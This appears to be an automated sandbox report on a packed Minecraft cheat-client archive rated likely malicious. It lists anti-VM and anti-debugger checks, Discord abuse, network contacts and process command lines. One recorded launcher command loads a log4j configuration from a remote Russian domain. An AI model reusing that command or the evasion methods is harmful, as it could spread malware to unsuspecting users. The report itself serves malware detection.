Analysis Overview
SHA256
12c03ef329d173728898959b9f406d2fcecec97b21489ab1f8f9acca5066b036
Threat Level: Likely malicious
The file nightware_pasted.zip was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
Themida packer
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 12:54
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 12:53
Reported
2024-06-11 12:59
Platform
win11-20240426-en
Max time kernel
274s
Max time network
271s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2551177587-3778486488-1329702901-1000\{53AD200A-852E-43D8-B5AB-B07AAFDC3AD1} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\nightware_pasted.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "
C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "
C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client
C:\Windows\SYSTEM32\rundll32.exe
rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "
C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client
C:\Windows\SYSTEM32\rundll32.exe
rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.19:443 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| GB | 95.101.143.201:443 | tcp | |
| US | 52.168.117.174:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| US | 162.159.136.234:443 | discord.gg | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| US | 162.159.137.232:443 | status.discord.com | tcp |
| US | 104.26.9.90:80 | optifine.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 127.0.0.1:6463 | tcp | |
| N/A | 127.0.0.1:6464 | tcp | |
| N/A | 127.0.0.1:6465 | tcp | |
| N/A | 127.0.0.1:6466 | tcp | |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.19.229.21:443 | api.hcaptcha.com | tcp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| N/A | 127.0.0.1:6467 | tcp | |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| N/A | 127.0.0.1:6468 | tcp | |
| US | 104.19.230.21:443 | api.hcaptcha.com | tcp |
| N/A | 127.0.0.1:6469 | tcp | |
| N/A | 127.0.0.1:6470 | tcp | |
| N/A | 127.0.0.1:6471 | tcp | |
| N/A | 127.0.0.1:6472 | tcp | |
| US | 162.159.136.234:443 | discord.gg | tcp |
| US | 162.159.128.233:443 | status.discord.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 13.107.246.64:443 | fp-afd-nocache-ccp.azureedge.net | tcp |
| US | 13.107.136.254:443 | spo-ring.msedge.net | tcp |
| US | 162.159.136.234:443 | discord.gg | tcp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| US | 52.123.128.254:443 | dual-s-ring.msedge.net | tcp |
| US | 104.26.9.90:80 | optifine.net | tcp |
| N/A | 127.0.0.1:6463 | tcp | |
| N/A | 127.0.0.1:6464 | tcp | |
| N/A | 127.0.0.1:6465 | tcp | |
| N/A | 127.0.0.1:6466 | tcp | |
| N/A | 127.0.0.1:6467 | tcp | |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| N/A | 127.0.0.1:6468 | tcp | |
| N/A | 127.0.0.1:6469 | tcp | |
| N/A | 127.0.0.1:6470 | tcp | |
| N/A | 127.0.0.1:6471 | tcp | |
| N/A | 127.0.0.1:6472 | tcp |
Files
memory/1156-0-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-1-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-2-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-3-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-4-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-7-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-6-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-5-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/1156-9-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-10-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-11-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-12-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-13-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-14-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-16-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-15-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7915c5c12c884cc2fa03af40f3d2e49d |
| SHA1 | d48085f85761cde9c287b0b70a918c7ce8008629 |
| SHA256 | e79d4b86d8cabd981d719da7f55e0540831df7fa0f8df5b19c0671137406c3da |
| SHA512 | 4c71eb6836546d4cfdb39cd84b6c44687b2c2dee31e2e658d12f809225cbd495f20ce69030bff1d80468605a3523d23b6dea166975cedae25b02a75479c3f217 |
\??\pipe\LOCAL\crashpad_3908_AHGLEBCBMWMRAAKR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 9faad3e004614b187287bed750e56acc |
| SHA1 | eeea3627a208df5a8cf627b0d39561167d272ac5 |
| SHA256 | 64a60300c46447926ce44b48ce179d01eff3dba906b83b17e48db0c738ca38a9 |
| SHA512 | a7470fe359229c2932aa39417e1cd0dc47f351963cbb39f4026f3a2954e05e3238f3605e13c870c9fe24ae56a0d07e1a6943df0e891bdcd46fd9ae4b7a48ab90 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cade32ea1b47b63a6154fc8b3e3874e6 |
| SHA1 | 3051465b6a34e970b9e4c1d1ab51f6131b410ba9 |
| SHA256 | 03ca625e10a0a7431a87d936779103886f03a6fec1ebdf7de2524391f7514fd8 |
| SHA512 | 0eecdb43c9f12c39e3ada5720ab1d94e2c0b862fd326cbe3469f282abfbb9e30793be91d24e1ef5689403d1661b25a9250ef6fd6e8f9bc83aa74141878c8d67b |
memory/2588-66-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
memory/2588-211-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1791b52056684a19047b902fa6b9b3db |
| SHA1 | 85448349d72f67ea96bed61cb364e0eccc3a1783 |
| SHA256 | 121437c527a35287271f1341b7ec52a1ec0302f854c73fba1ea585bd281e272f |
| SHA512 | 90971580f8cf1c4d23d764c6f96101bdd0c0af7e09dfbdb7b4543335fd7181eac5a4a9b86198440333e871df2a78a751e7ddfdf3eda7f07ccddf45fa63a59cf3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 79af9856cf72c70ef72f7b642d581da7 |
| SHA1 | 7b1609c4bb1674674126a6e51b7e9d21708ded1e |
| SHA256 | 39fcada3c2fd547e937a4e293871a89b61f5d165658a7bda49b76fbd4e79bb94 |
| SHA512 | 784d5dafd81e5efd161a8229b4b62eacdc8d7381c7c0fe3a653623f3e55e910359e5c3294ddda8979242e9382246b698e9fa6d92eff25ab1c7cc8d747736a471 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
